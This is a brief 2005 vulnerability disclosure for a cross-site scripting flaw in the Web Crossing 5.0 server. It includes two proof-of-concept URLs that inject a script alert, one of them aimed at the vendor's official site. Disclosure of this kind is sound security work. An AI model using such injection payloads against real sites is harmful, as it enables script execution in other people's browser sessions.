Web crossing 5.0 server cross site scripting

3 may 2005

Synopsis:
"Web Crossing 5.0 is a dramatic leap forward in server technology. With our unique, patent-pending plug-in
architecture, you pay for only what you need. Our plugin server automatically installs the plugins you choose,
making customization truly a "plug and play" process. Add themes, a whole new out-of-the-box look and feel, and 
exciting new plugins like weblogs and online brainstorming, and Web Crossing 5.0 is not to be missed!"

Description:
Web crossing 5.0 is susceptible to cross site scripting attack that may allow a remote attacker
to execute arbitary HTML and script code in a user's browser
session in context of a vulnerable site as well as to enumerate arbitary files.

example:

http://[host]/webx?79@24.DamcaTd0aNr.5<Script>alert()</script>

http://www.webcrossing.com/WebX?14@47.bKw4amhWubg.0<script>alert()</script>  (official site)



credits:
Dr_insane
dr_insane(at)pathfinder.gr